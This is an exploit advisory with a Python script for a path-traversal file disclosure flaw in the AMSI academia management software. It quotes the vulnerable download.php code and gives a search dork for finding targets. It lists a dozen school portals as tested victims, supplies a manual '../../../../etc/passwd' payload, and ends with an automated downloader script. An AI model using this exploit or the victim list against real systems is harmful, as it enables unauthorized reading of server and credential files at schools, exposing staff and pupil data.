.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage : http://h4x0resec.blogspot.com
[~] Guzel Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork : inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
#######################################################
### Error Line in 'download.php' ##
..
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);
// $path = $_GET['file'];
header("Content-Description: File Transfer");
header("Content-Type: application/force-download");
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );
@readfile($path);
..
########################################################
Example and tested on;
http://portal.iconnect.ae/
http://demo.iconnect.ae/
http://barsha.almawakeb.sch.ae/
http://portal.naischool.ae/
http://portal.ias-dubai.ae/
http://portal.madarschool.ae/
http://portal.isas.sch.ae/
http://portal.alsanawbarschool.com/
http://fia.fischools.com/
http://portal.ajyal.sch.ae/
http://portal.arabunityschool.com/
http://alnashaa.sch.ae/
http://portal.aaess.com/
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################
# Coded by b3mb4m
import random
import os
import urllib
class B3mB4m(object):
def example(self):
print """
How to use ?
Website: http://VICTIM.com
Path : /download.php?file=../../../../etc/passwd
"""
def exploit(self):
ask = raw_input("Website :")
uz = raw_input("Path : ")
#ask = "http://alnashaa.sch.ae"
#uz = "/download.php?file=../../../../etc/passwd"
uniq = str(random.randrange(1,1000+1))+".txt"
filee = ask+uz
try:
urllib.urlretrieve(filee, uniq);
print "\t\nDownload complate ! "
os.startfile(uniq)
except:
B3mB4m().example()
if __name__ == '__main__':
B3mB4m().exploit()